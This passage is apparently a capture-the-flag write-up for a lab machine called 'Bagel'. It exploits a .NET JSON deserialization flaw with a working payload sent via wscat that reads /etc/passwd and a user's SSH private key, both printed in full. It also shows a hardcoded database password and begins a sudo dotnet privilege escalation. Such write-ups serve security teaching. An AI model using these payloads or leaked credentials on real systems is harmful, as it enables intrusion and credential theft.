class="cl"> <span class="n">ArraySegment</span><span class="p">&lt;</span><span class="kt">byte</span><span class="p">&gt;</span> <span class="n">data</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">num</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ArraySegment</span><span class="p">&lt;</span><span class="kt">byte</span><span class="p">&gt;.</span><span class="n">op_Inequality</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">Data</span><span class="p">,</span> <span class="n">ArraySegment</span><span class="p">&lt;</span><span class="kt">byte</span><span class="p">&gt;.</span><span class="n">op_Implicit</span><span class="p">((</span><span class="kt">byte</span><span class="p">[])</span> <span class="kc">null</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> <span class="n">data</span> <span class="p">=</span> <span class="n">args</span><span class="p">.</span><span class="n">Data</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">num</span> <span class="p">=</span> <span class="n">data</span><span class="p">.</span><span class="n">Count</span> <span class="p">&gt;</span> <span class="m">0</span> <span class="p">?</span> <span class="m">1</span> <span class="p">:</span> <span class="m">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">num</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">num</span> <span class="p">!=</span> <span class="m">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> <span class="n">Encoding</span> <span class="n">utF8</span> <span class="p">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="p">=</span> <span class="n">args</span><span class="p">.</span><span class="n">Data</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">byte</span><span class="p">[]</span> <span class="n">array</span> <span class="p">=</span> <span class="n">data</span><span class="p">.</span><span class="n">Array</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="p">=</span> <span class="n">args</span><span class="p">.</span><span class="n">Data</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">count</span> <span class="p">=</span> <span class="n">data</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">json</span> <span class="p">=</span> <span class="n">utF8</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">array</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">count</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="n">Handler</span> <span class="n">handler</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Handler</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="kt">object</span> <span class="n">obj1</span> <span class="p">=</span> <span class="n">handler</span><span class="p">.</span><span class="n">Deserialize</span><span class="p">(</span><span class="n">json</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">object</span> <span class="n">obj2</span> <span class="p">=</span> <span class="n">handler</span><span class="p">.</span><span class="n">Serialize</span><span class="p">(</span><span class="n">obj1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Bagel</span><span class="p">.</span><span class="n">_Server</span><span class="p">.</span><span class="n">SendAsync</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">IpPort</span><span class="p">,</span> <span class="n">obj2</span><span class="p">.</span><span class="n">ToString</span><span class="p">(),</span> <span class="k">new</span> <span class="n">CancellationToken</span><span class="p">());</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>Looking up the the <code>Deserialize</code> function(<code>cmd/ctrl+click</code>), it is using a function from <code>Newtonsoft</code> library to deserialize json and return object. It has a configuration <code>TypeNameHandling=4</code> which is <div class="notice notice-info"> ===> <span style="color: #d461e8">TypeNameHandling Enum Auto (4)</span>: Include the .NET type name when the type of the object being serialized is not the same as its declared type. This is useful when dealing with polymorphic types, where the runtime type of the object is different from the compile-time type. It ensures that type names are included only when the runtime type of the object being serialized is different from its declared type. This helps handle scenarios involving polymorphism without unnecessarily cluttering the JSON with type information for every object. --- ChatGPT </div> This is in short, we can give an object to be deserialized by setting a <code>type</code> parameter in the data. Now looking at the <code>Orders.cs</code> file there are three functions available, <code>RemoveOrder</code>, <code>WriteOrder</code> and <code>ReadOrder</code>. <div class="notice notice-tip"> The <span style="color: #d461e8">RemoveOrder</span> is an object here. This is a potential vector as objects can be used to call other objects. </div> <code>ReadOrder</code> function is calling <code>ReadFile</code> function from the <code>File.cs</code> file. It is reading a file <code>orders.txt</code> from <code>/opt/bagel/orders/</code> directory. Now I can try reading data from this function by exploiting the Deseriazation of arbitrary json data. Looking at <a class="link" href="https://www.newtonsoft.com/json/help/html/SerializeTypeNameHandling.htm" target="_blank" rel="noopener" ><code>TypeNameHandling</code></a> in Newtonsoft docs,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-csharp" data-lang="csharp"><span class="line"><span class="cl"><span class="n">Stockholder</span> <span class="n">stockholder</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Stockholder</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">FullName</span> <span class="p">=</span> <span class="s">&#34;Steve Stockholder&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">Businesses</span> <span class="p">=</span> <span class="k">new</span> <span class="n">List</span><span class="p">&lt;</span><span class="n">Business</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">new</span> <span class="n">Hotel</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Name</span> <span class="p">=</span> <span class="s">&#34;Hudson Hotel&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">Stars</span> <span class="p">=</span> <span class="m">4</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">string</span> <span class="n">jsonTypeNameAll</span> <span class="p">=</span> <span class="n">JsonConvert</span><span class="p">.</span><span class="n">SerializeObject</span><span class="p">(</span><span class="n">stockholder</span><span class="p">,</span> <span class="n">Formatting</span><span class="p">.</span><span class="n">Indented</span><span class="p">,</span> <span class="k">new</span> <span class="n">JsonSerializerSettings</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">TypeNameHandling</span> <span class="p">=</span> <span class="n">TypeNameHandling</span><span class="p">.</span><span class="n">All</span> </span></span><span class="line"><span class="cl"><span class="p">});</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">jsonTypeNameAll</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="c1">// {</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;$type&#34;: &#34;Newtonsoft.Json.Samples.Stockholder, Newtonsoft.Json.Tests&#34;,</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;FullName&#34;: &#34;Steve Stockholder&#34;,</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;Businesses&#34;: {</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;$type&#34;: &#34;System.Collections.Generic.List`1[[Newtonsoft.Json.Samples.Business, Newtonsoft.Json.Tests]], mscorlib&#34;,</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;$values&#34;: [</span> </span></span><span class="line"><span class="cl"><span class="c1">// {</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;$type&#34;: &#34;Newtonsoft.Json.Samples.Hotel, Newtonsoft.Json.Tests&#34;,</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;Stars&#34;: 4,</span> </span></span><span class="line"><span class="cl"><span class="c1">// &#34;Name&#34;: &#34;Hudson Hotel&#34;</span> </span></span><span class="line"><span class="cl"><span class="c1">// }</span> </span></span><span class="line"><span class="cl"><span class="c1">// ]</span> </span></span><span class="line"><span class="cl"><span class="c1">// }</span> </span></span><span class="line"><span class="cl"><span class="c1">// }</span> </span></span></code></pre></div><p>The commented section is the serialized output of the <code>stockholder</code> object. The <code>$type</code> holds two info, first one is the namespace, second is the assembly name(project_name).(ChatGPT explains it very clearly). Now for this case, namespace is <code>bagel_server</code> and assembly name is <code>bagel</code>, then rest of the params. Now I can create a payload for <code>RemoveOrder</code> which calls the <code>ReadFile</code> function.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">echo</span> <span class="s1">&#39;{&#34;RemoveOrder&#34;: {&#34;$type&#34;: &#34;bagel_server.File, bagel&#34;, &#34;ReadFile&#34;: &#34;../../../etc/passwd&#34;}}&#39;</span> <span class="o">|</span> <span class="n">jq</span> <span class="p">.</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;RemoveOrder&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;$type&#34;</span><span class="p">:</span> <span class="s2">&#34;bagel_server.File, bagel&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ReadFile&#34;</span><span class="p">:</span> <span class="s2">&#34;../../../etc/passwd&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p><div class="notice notice-info"> First I am calling the RemoveOrder and passing it the rest of the data. The namespace is <span style="color: #d461e8">bagel_server.File</span> bcoz the <span style="color: #d461e8">ReadFile</span> is in that file. The assembly is <span style="color: #d461e8">bagel</span> as it is the project root name. I am calling then the <span style="color: #d461e8">ReadFile</span> function and passing the file location as a param. </div> Looking further, there is also a <code>DB.cs</code> file, which has some creds,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-csharp" data-lang="csharp"><span class="line"><span class="cl"><span class="kd">public</span> <span class="k">void</span> <span class="n">DB_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">SqlConnection</span> <span class="n">sqlConnection</span> <span class="p">=</span> <span class="k">new</span> <span class="n">SqlConnection</span><span class="p">(</span><span class="s">&#34;Data Source=ip;Initial Catalog=Orders;User ID=dev;Password=k8wdAYYKyhnjg3K&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><h3 id="port-5000">Port 5000 </h3><p>Nmap enumeration tried sending HTTP requests to it and got the server results. The header &ldquo;Server: Microsoft-NetCore/2.0&rdquo; reveals a <code>.NET</code> service running in this port. From earlier enumeration, this is a websocket server. So I will send the payload to this port.</p> <p>To talk with a websocket server, I am using <a class="link" href="https://github.com/websockets/wscat" target="_blank" rel="noopener" ><code>wscat</code></a> tool.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">wscat</span> <span class="c1">--connect ws://bagel.htb:5000/order</span> </span></span><span class="line"><span class="cl"><span class="n">Connected</span> <span class="p">(</span><span class="n">press</span> <span class="n">CTRL</span><span class="o">+</span><span class="n">C</span> <span class="n">to</span> <span class="n">quit</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="p">{</span><span class="s2">&#34;RemoveOrder&#34;</span><span class="p">:</span> <span class="p">{</span><span class="s2">&#34;$type&#34;</span><span class="p">:</span> <span class="s2">&#34;bagel_server.File, bagel&#34;</span><span class="p">,</span> <span class="s2">&#34;ReadFile&#34;</span><span class="p">:</span> <span class="s2">&#34;../../../etc/passwd&#34;</span><span class="p">}}</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserId&#34;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Session&#34;</span><span class="p">:</span> <span class="s2">&#34;Unauthorized&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Time&#34;</span><span class="p">:</span> <span class="s2">&#34;4:52:17&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;RemoveOrder&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;$type&#34;</span><span class="p">:</span> <span class="s2">&#34;bagel_server.File, bagel&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ReadFile&#34;</span><span class="p">:</span> <span class="s2">&#34;root:x:0:0:root:/root:/bin/bash</span><span class="se">\n</span><span class="s2">bin:x:1:1:bin:/bin:/sbin/nologin</span><span class="se">\n</span><span class="s2">daemon:x:2:2:daemon:/sbin:/sbin/nologin</span><span class="se">\n</span><span class="s2">adm:x:3:4:adm:/var/adm:/sbin/nologin</span><span class="se">\n</span><span class="s2">lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin</span><span class="se">\n</span><span class="s2">sync:x:5:0:sync:/sbin:/bin/sync</span><span class="se">\n</span><span class="s2">shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown</span><span class="se">\n</span><span class="s2">halt:x:7:0:halt:/sbin:/sbin/halt</span><span class="se">\n</span><span class="s2">mail:x:8:12:mail:/var/spool/mail:/sbin/nologin</span><span class="se">\n</span><span class="s2">operator:x:11:0:operator:/root:/sbin/nologin</span><span class="se">\n</span><span class="s2">games:x:12:100:games:/usr/games:/sbin/nologin</span><span class="se">\n</span><span class="s2">ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin</span><span class="se">\n</span><span class="s2">nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin</span><span class="se">\n</span><span class="s2">dbus:x:81:81:System message bus:/:/sbin/nologin</span><span class="se">\n</span><span class="s2">tss:x:59:59:Account used for TPM access:/dev/null:/sbin/nologin</span><span class="se">\n</span><span class="s2">systemd-network:x:192:192:systemd Network Management:/:/usr/sbin/nologin</span><span class="se">\n</span><span class="s2">systemd-oom:x:999:999:systemd Userspace OOM Killer:/:/usr/sbin/nologin</span><span class="se">\n</span><span class="s2">systemd-resolve:x:193:193:systemd Resolver:/:/usr/sbin/nologin</span><span class="se">\n</span><span class="s2">polkitd:x:998:997:User for polkitd:/:/sbin/nologin</span><span class="se">\n</span><span class="s2">rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin</span><span class="se">\n</span><span class="s2">abrt:x:173:173::/etc/abrt:/sbin/nologin</span><span class="se">\n</span><span class="s2">setroubleshoot:x:997:995:SELinux troubleshoot server:/var/lib/setroubleshoot:/sbin/nologin</span><span class="se">\n</span><span class="s2">cockpit-ws:x:996:994:User for cockpit web service:/nonexisting:/sbin/nologin</span><span class="se">\n</span><span class="s2">cockpit-wsinstance:x:995:993:User for cockpit-ws instances:/nonexisting:/sbin/nologin</span><span class="se">\n</span><span class="s2">rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin</span><span class="se">\n</span><span class="s2">sshd:x:74:74:Privilege-separated SSH:/usr/share/empty.sshd:/sbin/nologin</span><span class="se">\n</span><span class="s2">chrony:x:994:992::/var/lib/chrony:/sbin/nologin</span><span class="se">\n</span><span class="s2">dnsmasq:x:993:991:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin</span><span class="se">\n</span><span class="s2">tcpdump:x:72:72::/:/sbin/nologin</span><span class="se">\n</span><span class="s2">systemd-coredump:x:989:989:systemd Core Dumper:/:/usr/sbin/nologin</span><span class="se">\n</span><span class="s2">systemd-timesync:x:988:988:systemd Time Synchronization:/:/usr/sbin/nologin</span><span class="se">\n</span><span class="s2">developer:x:1000:1000::/home/developer:/bin/bash</span><span class="se">\n</span><span class="s2">phil:x:1001:1001::/home/phil:/bin/bash</span><span class="se">\n</span><span class="s2">_laurel:x:987:987::/var/log/laurel:/bin/false&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WriteFile&#34;</span><span class="p">:</span> <span class="n">null</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WriteOrder&#34;</span><span class="p">:</span> <span class="n">null</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ReadOrder&#34;</span><span class="p">:</span> <span class="n">null</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>I could read the <code>passwd</code> file. Now remembering the comment on using ssh key to login, I looked for <code>id_rsa</code> file of the two users. I got the key for <code>phil</code> user and formatted it by using CyberChef.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="p">{</span><span class="s2">&#34;RemoveOrder&#34;</span><span class="p">:</span> <span class="p">{</span><span class="s2">&#34;$type&#34;</span><span class="p">:</span> <span class="s2">&#34;bagel_server.File, bagel&#34;</span><span class="p">,</span> <span class="s2">&#34;ReadFile&#34;</span><span class="p">:</span> <span class="s2">&#34;../../../home/phil/.ssh/id_rsa&#34;</span><span class="p">}}</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserId&#34;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Session&#34;</span><span class="p">:</span> <span class="s2">&#34;Unauthorized&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Time&#34;</span><span class="p">:</span> <span class="s2">&#34;4:53:11&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;RemoveOrder&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;$type&#34;</span><span class="p">:</span> <span class="s2">&#34;bagel_server.File, bagel&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ReadFile&#34;</span><span class="p">:</span> <span class="s2">&#34;-----BEGIN OPENSSH PRIVATE KEY-----</span><span class="se">\n</span><span class="s2">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn</span><span class="se">\n</span><span class="s2">NhAAAAAwEAAQAAAYEAuhIcD7KiWMN8eMlmhdKLDclnn0bXShuMjBYpL5qdhw8m1Re3Ud+2</span><span class="se">\n</span><span class="s2">s8SIkkk0KmIYED3c7aSC8C74FmvSDxTtNOd3T/iePRZOBf5CW3gZapHh+mNOrSZk13F28N</span><span class="se">\n</span><span class="s2">dZiev5vBubKayIfcG8QpkIPbfqwXhKR+qCsfqS//bAMtyHkNn3n9cg7ZrhufiYCkg9jBjO</span><span class="se">\n</span><span class="s2">ZL4+rw4UyWsONsTdvil6tlc41PXyETJat6dTHSHTKz+S7lL4wR/I+saVvj8KgoYtDCE1sV</span><span class="se">\n</span><span class="s2">VftUZhkFImSL2ApxIv7tYmeJbombYff1SqjHAkdX9VKA0gM0zS7but3/klYq6g3l+NEZOC</span><span class="se">\n</span><span class="s2">M0/I+30oaBoXCjvupMswiY/oV9UF7HNruDdo06hEu0ymAoGninXaph+ozjdY17PxNtqFfT</span><span class="se">\n</span><span class="s2">eYBgBoiRW7hnY3cZpv3dLqzQiEqHlsnx2ha/A8UhvLqYA6PfruLEMxJVoDpmvvn9yFWxU1</span><span class="se">\n</span><span class="s2">YvkqYaIdirOtX/h25gvfTNvlzxuwNczjS7gGP4XDAAAFgA50jZ4OdI2eAAAAB3NzaC1yc2</span><span class="se">\n</span><span class="s2">EAAAGBALoSHA+yoljDfHjJZoXSiw3JZ59G10objIwWKS+anYcPJtUXt1HftrPEiJJJNCpi</span><span class="se">\n</span><span class="s2">GBA93O2kgvAu+BZr0g8U7TTnd0/4nj0WTgX+Qlt4GWqR4fpjTq0mZNdxdvDXWYnr+bwbmy</span><span class="se">\n</span><span class="s2">msiH3BvEKZCD236sF4SkfqgrH6kv/2wDLch5DZ95/XIO2a4bn4mApIPYwYzmS+Pq8OFMlr</span><span class="se">\n</span><span class="s2">DjbE3b4perZXONT18hEyWrenUx0h0ys/ku5S+MEfyPrGlb4/CoKGLQwhNbFVX7VGYZBSJk</span><span class="se">\n</span><span class="s2">i9gKcSL+7WJniW6Jm2H39UqoxwJHV/VSgNIDNM0u27rd/5JWKuoN5fjRGTgjNPyPt9KGga</span><span class="se">\n</span><span class="s2">Fwo77qTLMImP6FfVBexza7g3aNOoRLtMpgKBp4p12qYfqM43WNez8TbahX03mAYAaIkVu4</span><span class="se">\n</span><span class="s2">Z2N3Gab93S6s0IhKh5bJ8doWvwPFIby6mAOj367ixDMSVaA6Zr75/chVsVNWL5KmGiHYqz</span><span class="se">\n</span><span class="s2">rV/4duYL30zb5c8bsDXM40u4Bj+FwwAAAAMBAAEAAAGABzEAtDbmTvinykHgKgKfg6OuUx</span><span class="se">\n</span><span class="s2">U+DL5C1WuA/QAWuz44maOmOmCjdZA1M+vmzbzU+NRMZtYJhlsNzAQLN2dKuIw56+xnnBrx</span><span class="se">\n</span><span class="s2">zFMSTw5IBcPoEFWxzvaqs4OFD/QGM0CBDKY1WYLpXGyfXv/ZkXmpLLbsHAgpD2ZV6ovwy9</span><span class="se">\n</span><span class="s2">1L971xdGaLx3e3VBtb5q3VXyFs4UF4N71kXmuoBzG6OImluf+vI/tgCXv38uXhcK66odgQ</span><span class="se">\n</span><span class="s2">Pn6CTk0VsD5oLVUYjfZ0ipmfIb1rCXL410V7H1DNeUJeg4hFjzxQnRUiWb2Wmwjx5efeOR</span><span class="se">\n</span><span class="s2">O1eDvHML3/X4WivARfd7XMZZyfB3JNJbynVRZPr/DEJ/owKRDSjbzem81TiO4Zh06OiiqS</span><span class="se">\n</span><span class="s2">+itCwDdFq4RvAF+YlK9Mmit3/QbMVTsL7GodRAvRzsf1dFB+Ot+tNMU73Uy1hzIi06J57P</span><span class="se">\n</span><span class="s2">WRATokDV/Ta7gYeuGJfjdb5cu61oTKbXdUV9WtyBhk1IjJ9l0Bit/mQyTRmJ5KH+CtAAAA</span><span class="se">\n</span><span class="s2">wFpnmvzlvR+gubfmAhybWapfAn5+3yTDjcLSMdYmTcjoBOgC4lsgGYGd7GsuIMgowwrGDJ</span><span class="se">\n</span><span class="s2">vE1yAS1vCest9D51grY4uLtjJ65KQ249fwbsOMJKZ8xppWE3jPxBWmHHUok8VXx2jL0B6n</span><span class="se">\n</span><span class="s2">xQWmaLh5egc0gyZQhOmhO/5g/WwzTpLcfD093V6eMevWDCirXrsQqyIenEA1WN1Dcn+V7r</span><span class="se">\n</span><span class="s2">DyLjljQtfPG6wXinfmb18qP3e9NT9MR8SKgl/sRiEf8f19CAAAAMEA/8ZJy69MY0fvLDHT</span><span class="se">\n</span><span class="s2">WhI0LFnIVoBab3r3Ys5o4RzacsHPvVeUuwJwqCT/IpIp7pVxWwS5mXiFFVtiwjeHqpsNZK</span><span class="se">\n</span><span class="s2">EU1QTQZ5ydok7yi57xYLxsprUcrH1a4/x4KjD1Y9ijCM24DknenyjrB0l2DsKbBBUT42Rb</span><span class="se">\n</span><span class="s2">zHYDsq2CatGezy1fx4EGFoBQ5nEl7LNcdGBhqnssQsmtB/Bsx94LCZQcsIBkIHXB8fraNm</span><span class="se">\n</span><span class="s2">iOExHKnkuSVqEBwWi5A2UPft+avpJfAAAAwQC6PBf90h7mG/zECXFPQVIPj1uKrwRb6V9g</span><span class="se">\n</span><span class="s2">GDCXgqXxMqTaZd348xEnKLkUnOrFbk3RzDBcw49GXaQlPPSM4z05AMJzixi0xO25XO/Zp2</span><span class="se">\n</span><span class="s2">iH8ESvo55GCvDQXTH6if7dSVHtmf5MSbM5YqlXw2BlL/yqT+DmBsuADQYU19aO9LWUIhJj</span><span class="se">\n</span><span class="s2">eHolE3PVPNAeZe4zIfjaN9Gcu4NWgA6YS5jpVUE2UyyWIKPrBJcmNDCGzY7EqthzQzWr4K</span><span class="se">\n</span><span class="s2">nrEIIvsBGmrx0AAAAKcGhpbEBiYWdlbAE=</span><span class="se">\n</span><span class="s2">-----END OPENSSH PRIVATE KEY-----&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WriteFile&#34;</span><span class="p">:</span> <span class="n">null</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WriteOrder&#34;</span><span class="p">:</span> <span class="n">null</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ReadOrder&#34;</span><span class="p">:</span> <span class="n">null</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>Now saving this to <code>id_rsa</code> and setting the correct permissions, I can now login via ssh.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">chmod</span> <span class="mi">600</span> <span class="n">id_rsa</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">ssh</span> <span class="o">-</span><span class="n">i</span> <span class="n">id_rsa</span> <span class="n">phil</span><span class="err">@</span><span class="n">bagel.htb</span> </span></span></code></pre></div><p>Now recalling, there was a password for a <code>dev</code> user in dll file and also a <code>developer</code> user in the system, i try to switch user to developer with the password and it worked.</p> <h2 id="privilege-escalation">Privilege Escalation </h2><p>Now as user <code>developer</code>, i found out my sudo rights for privilege escalation,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="p">[</span><span class="n">developer</span><span class="err">@</span><span class="n">bagel</span> <span class="n">phil</span><span class="p">]</span><span class="err">$</span> <span class="n">sudo</span> <span class="o">-</span><span class="n">l</span> </span></span><span class="line"><span class="cl"><span class="n">Matching</span> <span class="n">Defaults</span> <span class="n">entries</span> <span class="kr">for</span> <span class="n">developer</span> <span class="n">on</span> <span class="n">bagel</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="err">!</span><span class="n">visiblepw</span><span class="p">,</span> <span class="n">always_set_home</span><span class="p">,</span> <span class="n">match_group_by_gid</span><span class="p">,</span> <span class="n">always_query_group_plugin</span><span class="p">,</span> <span class="n">env_reset</span><span class="p">,</span> <span class="n">env_keep</span><span class="o">=</span><span class="s2">&#34;COLORS DISPLAY HOSTNAME HISTSIZE </span></span></span><span class="line"><span class="cl"><span class="s2"> KDEDIR LS_COLORS&#34;</span><span class="p">,</span> <span class="n">env_keep</span><span class="o">+=</span><span class="s2">&#34;MAIL QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&#34;</span><span class="p">,</span> <span class="n">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT </span></span></span><span class="line"><span class="cl"><span class="s2"> LC_MESSAGES&#34;</span><span class="p">,</span> <span class="n">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&#34;</span><span class="p">,</span> <span class="n">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_TIME LC_ALL LANGUAGE LINGUAS </span></span></span><span class="line"><span class="cl"><span class="s2"> _XKB_CHARSET XAUTHORITY&#34;</span><span class="p">,</span> <span class="n">secure_path</span><span class="o">=/</span><span class="n">usr</span><span class="o">/</span><span class="kd">local</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="kd">local</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">var</span><span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">snapd</span><span class="o">/</span><span class="n">snap</span><span class="o">/</span><span class="n">bin</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">User</span> <span class="n">developer</span> <span class="n">may</span> <span class="n">run</span> <span class="n">the</span> <span class="n">following</span> <span class="n">commands</span> <span class="n">on</span> <span class="n">bagel</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">NOPASSWD</span><span class="p">:</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">dotnet</span> </span></span></code></pre></div><p>For abusing <code>sudo</code>, <code>suid</code> and <code>capabilities</code>, <a class="link" href="https://gtfobins.github.io/gtfobins/dotnet/" target="_blank" rel="noopener" >GTFObins</a> is a great website. Looking at it, there is a way to get root access using sudo permissions.</p> <p><img 